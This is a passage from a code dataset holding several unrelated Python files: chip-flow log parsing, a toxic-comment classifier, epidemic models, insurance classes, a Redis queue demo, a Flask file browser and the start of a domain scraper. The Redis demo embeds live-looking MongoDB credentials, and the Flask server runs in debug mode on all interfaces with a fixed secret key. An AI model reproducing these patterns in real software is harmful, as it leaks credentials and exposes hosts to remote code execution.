t=int)\nextractGnuTime(\"run__dp\",logPath+\"/3_3_opendp.log\")\n\n# CTS\n# ==============================================================================\nextractGnuTime(\"run__cts\",logPath+\"/4_cts.log\")\n\n# Route\n# ==============================================================================\n\nextractGnuTime(\"run__globalroute\",logPath+\"/5_1_fastroute.log\")\n\n\nextractTagFromFile(\"detailedroute__layers__num__total\",\n \"#layers: +(\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"detailedroute__inst__macro__num__total\",\n \"#macros: +(\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"detailedroute__num_vias\",\n \"#vias: +(\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"detailedroute__trackPts\",\n \"trackPts: +(\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"detailedroute__defvias__num__total\",\n \"defvias: +(\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"detailedroute__components__num__total\",\n \"#components: +(\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"detailedroute__terminals__num__total\",\n \"#terminals: +(\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"detailedroute__nets__num__total\",\n \"nets: +(\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"droute_num_unique_instances\",\n \"#unique instances = +(\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"detailedroute__unique_instances__num__total\",\n \"#scanned instances += +(\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"detailedroute__runtime\",\n \"Runtime taken \\(hrt\\): +(\\S+)\",\n 
logPath+\"/5_2_TritonRoute.log\", t=float)\nextractTagFromFile(\"detailedroute__wirelength__est\",\n \"total wire length = +(\\S+) um\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"detailedroute__via__num__total\",\n \"total number of vias = +(\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=int)\nextractTagFromFile(\"detailedroute__peak_mem\",\n \"peak = (\\S+)\",\n logPath+\"/5_2_TritonRoute.log\", t=float)\n\nextractTagFromFile(\"detailedroute__warnings\",\n \"(?i)warning:\",\n logPath+\"/5_2_TritonRoute.log\", -2, 0)\nextractTagFromFile(\"detailedroute__errors\",\n \"(?i)error:\",\n logPath+\"/5_2_TritonRoute.log\", -2, 0)\nextractTagFromFile(\"detailedroute__drc__num__total\",\n \"(?i)violation\",\n rptPath+\"/5_route_drc.rpt\", -2, 0)\n\nextractGnuTime(\"run__detailedroute\",logPath+\"/5_2_TritonRoute.log\")\n\n# Finish\n# ==============================================================================\n\nextractTagFromFile(\"finish__power__internal__total\",\n \"Total +(\\S+) +\\S+ +\\S+ +\\S+ +\\S+\",\n rptPath+\"/6_final_report.rpt\", t=float)\n\nextractTagFromFile(\"finish__power__switch__total\",\n \"Total +\\S+ +(\\S+) +\\S+ +\\S+ +\\S+\",\n rptPath+\"/6_final_report.rpt\", t=float)\n\nextractTagFromFile(\"finish__power__leak__total\",\n \"Total +\\S+ +\\S+ +(\\S+) +\\S+ +\\S+\",\n rptPath+\"/6_final_report.rpt\", t=float)\n\nextractTagFromFile(\"finish__power__total\",\n \"Total +\\S+ +\\S+ +\\S+ +(\\S+) +\\S+\",\n rptPath+\"/6_final_report.rpt\", t=float)\n\nextractTagFromFile(\"finish__area\",\n \"^Design area (\\S+ \\S+)\",\n rptPath+\"/6_final_report.rpt\")\nextractTagFromFile(\"finish__util\",\n \"^Design area.* (\\S+%) utilization\",\n rptPath+\"/6_final_report.rpt\")\n\nextractGnuTime(\"run__report\",logPath+\"/6_report.log\")\n\nextractGnuTime(\"run__merge\",logPath+\"/6_1_merge.log\")\n\n\nextractTagFromFile(\"drc_klayout_viols\",\n \"\",\n rptPath+\"/6_drc_count.rpt\", -2, 0, t=int)\n\n\n# Accumulate time\n# ==============================================================================\n\nfailed = False\ntotal = datetime.timedelta()\nfor key in jsonFile:\n if key.endswith(\"_time\"):\n # Big try block because Hour and microsecond is optional\n try:\n t = datetime.datetime.strptime(jsonFile[key],\"%H:%M:%S.%f\")\n except ValueError:\n try:\n t = datetime.datetime.strptime(jsonFile[key],\"%M:%S.%f\")\n except ValueError:\n try:\n t = datetime.datetime.strptime(jsonFile[key],\"%H:%M:%S\")\n except ValueError:\n try:\n t = datetime.datetime.strptime(jsonFile[key],\"%M:%S\")\n except ValueError:\n failed = True\n break\n\n delta = datetime.timedelta(hours=t.hour, minutes=t.minute, seconds=t.second)\n total += delta\n\nif failed:\n jsonFile[\"total_time\"] = \"ERR\"\nelse:\n jsonFile[\"total_time\"] = str(total)\n\n# print json.dumps(jsonFile, indent=2)\nwith open(args.output, \"w\") as resultSpecfile:\n json.dump(jsonFile, resultSpecfile, indent=2)\n","sub_path":"flow/util/genMetadata.py","file_name":"genMetadata.py","file_ext":"py","file_size_in_byte":17361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"486556683","text":"import math, collections\npowerSet = 6\nlistLabel = ['toxic','severe_toxic','obscene','threat','insult','identity_hate']\n\nclass UnigramLanguageModel:\n\n def __init__(self, corpus):\n self.unigramCounts = [collections.defaultdict(lambda: 0) for i in range(7)] \n self.nonInUnigramCounts = [collections.defaultdict(lambda: 0) for i in range(7)] \n self.totalYes = [0 for i in 
range(7)]\n self.totalNo = [0 for i in range(7)]\n self.p_label = [0 for i in range(7)]\n self.N = 13000 # estimate total number of words (including unknown words)\n self.ukp = 0.05\n self.train(corpus)\n\n def train(self, corpus):\n for index in range(min(1000, len(corpus['comment_text']))):\n \n if (index % 1000) == 0: \n print(index/1000)\n sentence = corpus['comment_text'][index]\n self.p_label[6] += 1\n for column in range(0, len(listLabel)):\n label = listLabel[column]\n if corpus[label][index] == 1:\n self.p_label[column] += 1\n for token in sentence:\n \n \n if corpus[label][index] == 1:\n self.unigramCounts[column][token] += 1\n self.totalYes[column] += 1\n else:\n self.nonInUnigramCounts[column][token] += 1\n self.totalNo[column] += 1\n \n for i in range(6):\n self.p_label[i] = max(float(self.p_label[i]) / self.p_label[6], 0.000005)\n print(self.p_label)\n \n def score(self, sentence):\n YesScore = [0.0 for i in range(powerSet)]\n NoScore = [0.0 for i in range(powerSet)]\n for i in range(0, len(listLabel)):\n label = listLabel[i]\n for token in sentence:\n countYes = self.unigramCounts[i][token]\n countNo = self.nonInUnigramCounts[i][token]\n if (countYes != 0):\n yesPro = (1.0 - self.ukp) * (float(countYes) / float(self.totalYes[i]+self.N)) + self.ukp * (1.0 / float(self.N))\n else:\n yesPro = self.ukp * (1.0 / float(self.N + self.totalYes[i]))\n\n if (countNo != 0):\n noPro = (1.0 - self.ukp) * (float(countNo) / float(self.totalNo[i]+self.N)) + self.ukp * (1.0 / float(self.N))\n else:\n noPro = self.ukp * (1.0 / float(self.N + self.totalNo[i]))\n \n \n YesScore[i] += math.log(yesPro)\n NoScore[i] += math.log(noPro)\n\n YesScore[i] += math.log(self.p_label[i])\n NoScore[i] += math.log(1.0 - self.p_label[i])\n \n \n maxLabel = [0 for i in range(powerSet)]\n for i in range(0, powerSet):\n if (YesScore[i] > NoScore[i]):\n maxLabel[i] = 1\n \n return maxLabel\n","sub_path":"model/binary-bayesian/UnigramLanguageModel.py","file_name":"UnigramLanguageModel.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"322752055","text":"from types import MappingProxyType\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom scipy import integrate\n\n\nclass ModelMeta(type):\n \"\"\"\n Meta class for model types.\n\n Reset the EXAMPLES dictionary for each sub-model.\n \"\"\"\n\n def __init__(cls, name, bases, ns):\n try:\n ns['EXAMPLES'] = MappingProxyType(ns['EXAMPLES'])\n except KeyError:\n pass\n\n super().__init__(name, bases, ns)\n\n\nclass Model(metaclass=ModelMeta):\n \"\"\"\n Base class for all Epidemic models.\n \"\"\"\n EXAMPLES = MappingProxyType({})\n PERIOD = 365.25 / 12\n MAX_PERIOD = 5 * 365.25\n STEPS = 30\n X_TOL = 0.1\n x0 = None\n columns = None\n sub_groups = ()\n\n @classmethod\n def main(cls, *args, **kwargs):\n \"\"\"\n Executes the default action for the model. 
Convenient for making quick\n        and dirty CLI tools.\n        \"\"\"\n        m = cls(*args, **kwargs)\n        run = m.run()\n        print(run)\n        run.plot()\n        plt.show()\n        return m, run\n\n    def __init__(self, *args, **kwargs):\n        if args:\n            key, = args\n            default = self.EXAMPLES[key]\n            kwargs = {**default, **kwargs}\n\n        for k, v in kwargs.items():\n            if hasattr(self, k):\n                setattr(self, k, v)\n            else:\n                raise TypeError(f'invalid argument: {k}')\n        if 'display_columns' not in kwargs:\n            self.display_columns = self.columns\n\n    def diff(self, x, t):\n        \"\"\"\n        Derivative function for state.\n        \"\"\"\n        raise NotImplementedError('implement in subclass')\n\n    def has_converged(self, times, xs):\n        \"\"\"\n        Read a sequence of times and a sequence of states and conclude if\n        simulation has already converged to a steady state.\n        \"\"\"\n        if len(times) > 2000:\n            return True\n        if times[-1] >= self.MAX_PERIOD:\n            return True\n        if (np.abs(xs[-1] - xs[-2]) < self.X_TOL / self.STEPS).all() \\\n                and self.has_burst(times, xs):\n            return True\n        return False\n\n    def has_burst(self, times, xs):\n        \"\"\"\n        Read a sequence of times and a sequence of states and conclude if\n        simulation has already experienced or is experiencing an epidemic burst.\n\n        It returns False only when it is likely that the burst has not yet\n        happened.\n        \"\"\"\n        return xs.std(1).max() > 100 * self.X_TOL\n\n    def trim_to_burst(self, times, xs):\n        \"\"\"\n        Find the epidemic peak and trim datasets to be around this peak.\n        \"\"\"\n        tol = 0.1 * xs.std(1)\n        x0 = xs[0]\n        xf = xs[-1]\n\n        i = 0\n        for x in xs:\n            if np.abs(x - x0) > tol:\n                break\n            i += 1\n\n        j = len(xs)\n        for x in reversed(xs):\n            j -= 1\n            if np.abs(x - xf) > tol:\n                break\n\n        return times[i:j], xs[i:j]\n\n    def run(self) -> 'Run':\n        \"\"\"\n        Run simulation until dynamics can be considered to be resolved.\n        \"\"\"\n        time = 0.0\n        x = self.x0\n        dt = self.PERIOD\n        steps = self.STEPS\n        times = np.array([time], dtype=float)\n        xs = np.array([x], dtype=float)\n\n        while True:\n            times_, xs_ = self._run_interval(dt, time, x, steps)\n            times = np.concatenate([times, times_[1:]])\n            xs = np.concatenate([xs, xs_[1:]])\n            time = times[-1]\n            x = xs[-1]\n\n            if self.has_converged(times, xs):\n                break\n\n        return self._to_result(times, xs)\n\n    def run_interval(self, dt, t0=0, x0=None, steps=100) -> 'Run':\n        \"\"\"\n        Run simulation by given interval\n        \"\"\"\n        return self._to_result(*self._run_interval(dt, t0, x0, steps))\n\n    def _run_interval(self, dt, t0, x0, steps):\n        x0 = self.x0 if x0 is None else x0\n        times = np.linspace(t0, t0 + dt, steps)\n        ys = integrate.odeint(self.diff, x0, times)\n        return times, ys\n\n    def _to_result(self, times, ys) -> 'Run':\n        cls = getattr(self, 'run_class', Run)\n        return cls(self._to_dataframe(times, ys), self)\n\n    def _to_dataframe(self, times, ys) -> pd.DataFrame:\n        if self.sub_groups:\n            names = 'column', 'age'\n            columns = pd.MultiIndex.from_product((self.columns, self.sub_groups), names=names)\n        else:\n            columns = self.columns\n        df = pd.DataFrame(ys, columns=columns)\n        df.index = times\n        return df\n\n    def summary(self, run):\n        \"\"\"\n        Return a summary string for the given run. Used by run instances to\n        perform string conversion.\n        \"\"\"\n        dic = self.summary_map(run)\n        keys = dic.keys()\n        size = max(map(len, keys))\n        keys = map(lambda x: x.ljust(size), keys)\n        values = map(str, dic.values())\n        return '\\n'.join(f'{k} : {v}' for k, v in zip(keys, values))\n\n    def summary_map(self, run):\n        \"\"\"\n        Convenient access to summary data as a dictionary. 
Useful for\n        subclasses to avoid excessive string formatting operations when\n        implementing the summary() method.\n        \"\"\"\n        raise NotImplementedError('must be implemented in subclasses')\n\n    def get_data(self, df, name):\n        \"\"\"\n        Returns pre-processed data from the dataframe. Subclasses might implement\n        methods such as get_data_<name> to handle specific names.\n        \"\"\"\n        try:\n            method = getattr(self, f'get_data_{name}')\n        except AttributeError:\n            return df[name]\n        else:\n            return method(df)\n\n\nclass Run:\n    \"\"\"\n    Represents an execution of the model.\n    \"\"\"\n    values = property(lambda self: self.data.values)\n\n    def __init__(self, data, model):\n        self.data = data\n        self.model = model\n\n    def __str__(self):\n        return self.model.summary(self)\n\n    def __getattr__(self, item):\n        try:\n            return self.model.get_data(self.data, item)\n        except ValueError:\n            raise AttributeError(item)\n\n    def plot(self, show=False):\n        res = self.data[self.model.display_columns].plot()\n        if show:\n            plt.show()\n        else:\n            return res\n","sub_path":"covid/models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"16048380","text":"import uuid\r\n\r\n# Represents the customer of the car insurance company\r\nclass Customer:\r\n    def __init__(self, name, address):\r\n        self.ID= str(uuid.uuid1())\r\n        self.name = name\r\n        self.address = address\r\n        self.cars = [] #objects\r\n        self.agent = [] #one agent per customer only ID because of comment below\r\n        self.claims = [] #objects\r\n        self.payments = [] #objects\r\n\r\n    def addCar (self, car):\r\n        self.cars.append(car)\r\n\r\n\r\n    def addAgent(self,agent):\r\n        if len(self.agent) == 0:\r\n            #!!! Can only implement ID not the whole agent object because agent and customer object\r\n            # would reference each other and that causes the serialization to throw recursion errors\r\n            # which I'm not able to solve\r\n            self.agent = agent.ID\r\n            return True\r\n        else:\r\n            return False\r\n\r\n    def addClaim(self, claim):\r\n        if len(self.agent) != 0:\r\n            self.claims.append(claim)\r\n            return True\r\n        else:\r\n            return False\r\n\r\n    def addPayment(self, payment):\r\n        self.payments.append(payment)\r\n\r\n    # convert object to JSON\r\n    def serialize(self):\r\n        return {\r\n            'id': self.ID, \r\n            'name': self.name, \r\n            'address': self.address,\r\n            #nested serialization as a list comprehension for car objects necessary\r\n            'cars': [car.serialize() for car in self.cars],\r\n            'agent': self.agent,\r\n            ### cannot implement that due to recursion issues\r\n            #'agent': [a.serialize() for a in self.agent]\r\n            'claims': [claim.serialize() for claim in self.claims],\r\n            'payments': [payment.serialize() for payment in self.payments]\r\n        }\r\n    \r\nclass Car :\r\n    def __init__(self, model_name, number_plate, motor_power, year):\r\n        self.name = model_name\r\n        self.number_plate = number_plate\r\n        self.motor_power = motor_power\r\n        self.year = year\r\n        self.owner = [] #ID due to recursion error\r\n\r\n    def setOwner(self, owner):\r\n        self.owner = owner.ID\r\n\r\n    # convert object to JSON\r\n    def serialize(self):\r\n        return {\r\n            'model': self.name,\r\n            'numberplate': self.number_plate,\r\n            'motor power': self.motor_power,\r\n            'manufacturing year': self.year,\r\n            ### cannot implement that due to recursion issues\r\n            #'owner': [c.serialize() for c in self.owner]\r\n            'owner': self.owner\r\n        }\r\n\r\nclass Claim:\r\n    def __init__(self, date, incident_description, claim_amount):\r\n        self.ID = str(uuid.uuid1())\r\n        self.date 
= date\r\n        self.incident_description = incident_description\r\n        self.claim_amount = claim_amount\r\n        self.status = None\r\n        self.approved_amount = None\r\n        self.responsible_agent = [] # ID only\r\n        self.applicant = [] # ID only\r\n\r\n    def setAgent(self, agent):\r\n        self.responsible_agent = agent.ID\r\n\r\n    def setApplicant(self, applicant):\r\n        self.applicant = applicant.ID\r\n\r\n    def evaluateStatus(self, amount):\r\n        if self.approved_amount == None:\r\n            self.approved_amount = amount\r\n            if self.approved_amount >= self.claim_amount:\r\n                self.status = \"FULLY COVERED\"\r\n            elif self.approved_amount <= 0:\r\n                self.status = \"REJECTED\"\r\n            else:\r\n                self.status = \"PARTLY COVERED\"\r\n            return True\r\n        else:\r\n            return False\r\n\r\n    # convert object to JSON\r\n    def serialize(self):\r\n        return {\r\n            'id': self.ID,\r\n            'date': self.date,\r\n            'incident_description': self.incident_description,\r\n            'claim_amount': self.claim_amount,\r\n            'status' : self.status,\r\n            'approved_amount' : self.approved_amount,\r\n            'responsible_agent': self.responsible_agent,\r\n            'applicant': self.applicant\r\n        }\r\n\r\nclass Payment:\r\n    def __init__(self,date):\r\n        self.ID = str(uuid.uuid1())\r\n        self.date = date\r\n\r\nclass Revenue(Payment):\r\n    def __init__(self, date, customer_id, amount_received):\r\n        Payment.__init__(self, date)\r\n        self.customer_id = customer_id\r\n        self.amount_received = amount_received\r\n\r\n    def serialize(self):\r\n        return {\r\n            'id': self.ID,\r\n            'date': self.date,\r\n            'customer_id': self.customer_id,\r\n            'amount_received': self.amount_received\r\n        }\r\n\r\nclass Expense(Payment):\r\n    def __init__(self, date, agent_id, amount_sent):\r\n        Payment.__init__(self, date)\r\n        self.agent_id = agent_id\r\n        self.amount_sent = amount_sent\r\n\r\n    def serialize(self):\r\n        return {\r\n            'id': self.ID,\r\n            'date': self.date,\r\n            'agent_id': self.agent_id,\r\n            'amount_sent': self.amount_sent\r\n        }\r\n\r\n","sub_path":"Customer.py","file_name":"Customer.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"175991072","text":"import pyvinecopulib as pvcl\nimport numpy as np\n\nn = 100\n\nbcp = pvcl.bicop(pvcl.gaussian, 0, np.array([[.5]]))\nsim_data = bcp.simulate(n)\nll = bcp.loglik(sim_data)\n\nassert type(ll) == float\n","sub_path":"tests/unit/bicop_loglik.py","file_name":"bicop_loglik.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"44688674","text":"# -*- coding: utf-8 -*-\nimport redis\nimport json\nimport random\nimport time\nfrom pymongo import MongoClient\n\nuri = 'mongodb://imooc1:imooc1@119.23.207.42:27017/imooc'\nconn = MongoClient(uri)\ndb = conn.get_database('imooc')\ninfoTable = db.dzdp_info_hub_ceshi_1  # stores the shop information\n\n# constants\nQUEUE_NAME = 'dzdp_info'\n\n\ndef redis_t_1():\n    r = redis.Redis(host='localhost', port=6379, decode_responses=True)  # host is the redis server; both the redis server and client must be running; the default redis port is 6379\n    r.set('name', 'junxi')  # key is \"foo\", value is \"bar\"; stores the key-value pair in the redis cache\n    print(r['name'])\n    print(r.get('name'))  # fetch the value stored under the key 'name'\n    print(type(r.get('name')))\n\n\nredisPool = redis.ConnectionPool(host='localhost', port=6379, db=8)\nclient = redis.Redis(connection_pool=redisPool)\n\n\ndef put_data():\n    for i in infoTable.find():\n        push_data(i)\n        time_sleep = random.randint(1, 10)\n        time.sleep(time_sleep)\n        print(i)\n\n\ndef get_data():\n    while True:\n        print(pop_data())\n\n\ndef push_data(json_data):\n    client.rpush(QUEUE_NAME, 
json_data['shop_id'])\n\n\ndef pop_data():\n while True:\n try:\n data_json = client.lpop(QUEUE_NAME)\n time.sleep(random.randint(1, 10))\n return data_json\n except Exception as e:\n data_json = None\n if data_json is None:\n return\n\n\nif __name__ == '__main__':\n # put_data()\n get_data()\n\n","sub_path":"notes/redis/redis/redis_demo2.py","file_name":"redis_demo2.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"21263704","text":"#!/usr/bin/env python\n\nPACKAGE = 'casper_sensors'\nimport roslib;roslib.load_manifest(PACKAGE)\nimport rospy\n\nimport dynamic_reconfigure.client\n\ntop_configured = False\nbottom_configured = False\n\ndef top_callback(config):\n \n global top_configured\n if config.ir_mode == config.color_mode == config.depth_mode == 8:\n rospy.logwarn(\"Top_camera running in QVGA\")\n top_configured = True\n else:\n rospy.loginfo(\"Configuring top_camera...\")\n\ndef bottom_callback(config):\n\n global bottom_configured\n if config.ir_mode == config.color_mode == config.depth_mode == 8:\n rospy.logwarn(\"Bottom_camera running in QVGA\")\n bottom_configured = True\n else:\n rospy.loginfo(\"Configuring bottom_camera...\")\n\nif __name__ == \"__main__\":\n rospy.init_node(\"openni2_config_client\")\n\n top_camera_client = dynamic_reconfigure.client.Client(\"casper_top_camera/driver\", timeout=30, config_callback=top_callback)\n bottom_camera_client = dynamic_reconfigure.client.Client(\"casper_bottom_camera/driver\", timeout=30, config_callback=bottom_callback)\n\n while not (rospy.is_shutdown() or (top_configured and bottom_configured)):\n if not top_configured:\n top_camera_client.update_configuration({\"ir_mode\":8, \"color_mode\":8, \"depth_mode\":8})\n if not bottom_configured: \n bottom_camera_client.update_configuration({\"ir_mode\":8, \"color_mode\":8, \"depth_mode\":8})\n","sub_path":"src/casper_sensors/src/openni2_config.py","file_name":"openni2_config.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"254793839","text":"import fresh_tomatoes\nimport media\n\n# Load each movie object statically\ncontact = media.Movie(\"Contact\",\n \"Dr. Ellie Arroway (Jodie Foster) works for the Search\"\n \" for Extraterrestrial Intelligence (SETI) program...\",\n \"http://www.gstatic.com/tv/thumb/movieposters/19587/p19587_p_v8_ab.jpg\",\n \"https://www.youtube.com/watch?v=SRoj3jK37Vc\")\n\nthe_dark_night = media.Movie(\"The Dark Night\",\n \"With the help of allies Lt. Jim Gordon (Gary\"\n \" Oldman) and DA Harvey Dent (Aaron Eckhart),\"\n \" Batman (Christian Bale) has been able to keep\"\n \" a tight lid on crime in Gotham City. But when\" \n \" a vile young criminal calling himself the\"\n \" Joker (Heath Ledger) suddenly throws the town\"\n \" into chaos, the caped Crusader begins to tread\"\n \" a fine line between heroism and vigilantism.\",\n \"http://www.gstatic.com/tv/thumb/movieposters/173378/p173378_p_v8_aa.jpg\",\n \"https://www.youtube.com/watch?v=EXeTwQWrcwY\")\n\nstar_trek_first_contact = media.Movie(\"Star Trek: First Contact\",\n \"The Enterprise and its crew follow a\"\n \" Borg ship through a time warp to\"\n \" prevent the Borg from taking over the\"\n \" Earth in a past era. Stuck in the past,\"\n \" Geordi La Forge (LeVar Burton) helps a\"\n \" pioneer of space travel (James\"\n \" Cromwell) in his efforts to create the\"\n \" first warp drive while Capt. 
Picard\"\n \" (Patrick Stewart) and Cmdr. Data (Brent\"\n \" Spiner) battle the Borg Queen (Alice\"\n \" Krige) as she tries to take over the \"\n \" Enterprise.\",\n \"http://t2.gstatic.com/images?q=tbn:ANd9GcQqKE15EvuPYXqFa5X1PWPlljp1pu5Ss1UUNS98qp8RkJnSBSUU\",\n \"https://www.youtube.com/watch?v=YQ1eiEvefKI\")\n\ninterstellar = media.Movie(\"Interstellar\",\n \" In Earth's future, a global crop blight and second\"\n \" Dust Bowl are slowly rendering the planet\"\n \" uninhabitable. Professor Brand (Michael Caine), a\"\n \" brilliant NASA physicist, is working on plans to\"\n \" save mankind by transporting Earth's population to\"\n \" a new home via a wormhole. But first, Brand must\"\n \" send former NASA pilot Cooper (Matthew\"\n \" McConaughey) and a team of researchers through the\"\n \" wormhole and across the galaxy to find out which\"\n \" of three planets could be mankind's new home.\",\n \"http://t1.gstatic.com/images?q=tbn:ANd9GcRf61mker2o4KH3CbVE7Zw5B1-VogMH8LfZHEaq3UdCMLxARZAB\",\n \"https://www.youtube.com/watch?v=nyc6RJEEe0U\")\n\nthe_departed = media.Movie(\"The Departed\",\n \"South Boston cop Billy Costigan (Leonardo DiCaprio)\"\n \" goes under cover to infiltrate the organization of\"\n \" gangland chief Frank Costello (Jack Nicholson). As\"\n \" Billy gains the mobster's trust, a career criminal\"\n \" named Colin Sullivan (Matt Damon) infiltrates the\"\n \" police department and reports on its activities to\"\n \" his syndicate bosses. When both organizations\"\n \" learn they have a mole in their midst, Billy and\"\n \" Colin must figure out each other's identities to\"\n \" save their own lives.\",\n \"http://www.gstatic.com/tv/thumb/movieposters/162564/p162564_p_v8_ag.jpg\",\n \"https://www.youtube.com/watch?v=iQpb1LoeVUc\")\n\nsunshine = media.Movie(\"Sunshine\",\n \"In the not-too-distant future, Earth's dying sun spells\"\n \" the end for humanity. 
In a last-ditch effort to save\"\n                       \" the planet, a crew of eight men and women ventures\"\n                       \" into space with a device that could revive the star.\"\n                       \" However, an accident, a grave mistake and a distress\"\n                       \" beacon from a long-lost spaceship throw the crew and\"\n                       \" its desperate mission into a tailspin.\",\n                       \"http://www.gstatic.com/tv/thumb/movieposters/161586/p161586_p_v8_aa.jpg\",\n                       \"https://www.youtube.com/watch?v=r8BSlqHAhuY\")\n\n# Place movies objects into a list for display\nmovies = [contact, the_dark_night, the_departed, interstellar, \n          star_trek_first_contact, sunshine]\n\n# Generate a webpage based on the list\nfresh_tomatoes.open_movies_page(movies)\n","sub_path":"generate_site_static.py","file_name":"generate_site_static.py","file_ext":"py","file_size_in_byte":5449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"443585890","text":"from flask import Flask, render_template, request, send_file, redirect, session\nimport os\nimport sys\nimport json\n\napp = Flask(__name__)\napp.secret_key = 'my_secret_key'\n#currentDirectory='/Users/rehan/Downloads'\n\nwith open('config.json') as json_data_file:\n    data = json.load(json_data_file)\nhiddenList = data[\"Hidden\"]\nfavList = data[\"Favorites\"]\npassword = data[\"Password\"]\ncurrentDirectory=data[\"rootDir\"]\n\n\nif(len(favList)>3):\n    favList=favList[0:3]\n\nfor i in range(0,3):\n    favList[i]=favList[i].replace('/','>')\n\n\n\n@app.route('/login/')\ndef loginMethod():\n    global password\n    if(password==''):\n        session['login'] = True\n\n\n    if('login' in session):\n        return redirect('/')\n    else:\n        return render_template('login.html')\n\n\n@app.route('/login/', methods=['POST'])\ndef loginPost():\n    global password\n\n    text = request.form['text']\n    if(text==password):\n        session['login'] = True\n\n        return redirect('/')\n    else:\n        return redirect('/login/')\n\n@app.route('/logout/')\ndef logoutMethod():\n    if('login' in session):\n        session.pop('login',None)\n    return redirect('/login/')\n    \n#@app.route('/exit/')\n#def exitMethod():\n#    exit()\n\n\n\n\ndef hidden(path):\n\n    for i in hiddenList:\n        if i != '' and i in path:\n            return True\n    \n    return False\n\n\n\ndef changeDirectory(path):\n    global currentDirectory\n\n    pathC = path.split('>')\n    \n    if(pathC[0]==\"\"):\n        pathC.remove(pathC[0])\n    \n    myPath = currentDirectory+'/'+'/'.join(pathC)\n    #print(myPath)\n    try:\n        os.chdir(myPath)\n        ans=True\n        if(currentDirectory not in os.getcwd()):\n            ans = False\n    except:\n        ans=False\n    \n    \n\n    return ans\n    \ndef getDirList():\n\n\n    dList= list(filter(lambda x: os.path.isdir(x), os.listdir('.')))\n    finalList = []\n    curDir=os.getcwd()\n\n    for i in dList:\n        if(hidden(curDir+'/'+i)==False):\n            finalList.append(i)\n\n    return(finalList)\n\n\ndef getFileList():\n\n    dList = list(filter(lambda x: os.path.isfile(x), os.listdir('.')))\n\n    finalList = []\n    curDir=os.getcwd()\n\n    for i in dList:\n        if(hidden(curDir+'/'+i)==False):\n            finalList.append(i)\n\n    return(finalList)\n\n\n\n\n\n\n@app.route('/<path:var>', methods=['GET'])\ndef filePage(var):\n    if('login' not in session):\n        return redirect('/login/')\n    \n    if(changeDirectory(var)==False):\n        #Invalid Directory\n        print(\"Directory Doesn't Exist\")\n        return render_template('404.html',errorCode=300,errorText='Invalid Directory Path',favList=favList)\n    \n    try:\n        dirList = getDirList()\n        fileList = getFileList()\n    except:\n        return render_template('404.html',errorCode=200,errorText='Permission Denied',favList=favList)\n\n\n    return 
render_template('home.html',dirList=dirList,fileList=fileList,currentDir=var,favList=favList)\n\n@app.route('/', methods=['GET'])\ndef homePage():\n    global currentDirectory\n    if('login' not in session):\n        return redirect('/login/')\n    \n\n\n    os.chdir(currentDirectory)\n    dirList = getDirList()\n    fileList=getFileList()\n    return render_template('home.html',dirList=dirList,fileList=fileList,currentDir=\"\",favList=favList)\n\n\n@app.route('/download/<path:var>')\ndef downloadFile(var):\n    global currentDirectory\n    if('login' not in session):\n        return redirect('/login/')\n    \n    #os.chdir(currentDirectory)\n\n    pathC = var.split('>')\n    if(pathC[0]==''):\n        pathC.remove(pathC[0])\n    \n    fPath = '/'.join(pathC)\n    fPath=currentDirectory+'/'+fPath\n    \n    if(hidden(fPath)):\n        #FILE HIDDEN\n        return render_template('404.html',errorCode=100,errorText='File Hidden',favList=favList)\n\n\n    fName=pathC[len(pathC)-1]\n    #print(fPath)\n    try:\n        return send_file(fPath, attachment_filename=fName)\n    except:\n        return render_template('404.html',errorCode=200,errorText='Permission Denied',favList=favList)\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n    if('login' not in session):\n        return redirect('/login/')\n    \n    # note that we set the 404 status explicitly\n    return render_template('404.html',errorCode=404,errorText='Page Not Found',favList=favList), 404\n\n\n\nif __name__ == '__main__':\n    app.run(host= '0.0.0.0',debug=True)","sub_path":"setupMac.py","file_name":"setupMac.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"420552820","text":"from bs4 import BeautifulSoup\nfrom requests import utils\nimport os\nimport pandas as pd\nimport pickle\nfrom urllib import parse\nimport time\n\nfrom django.conf import settings\n\nfrom common.session import Session\n\n\nclass ExpiredDomains(Session):\n    USE_PROXY = True\n    NAME = 'expireddomains'\n    TIMEOUT = 10\n    BASE_URL = 'https://member.expireddomains.net/'\n    LOGIN_URL = BASE_URL + 'login/'\n    GET_URL = BASE_URL + 'domains/expiredcom{date}'\n    COLUMN_URL = BASE_URL + 'account/columnmanager/'\n    TRIES_COUNT = 30\n    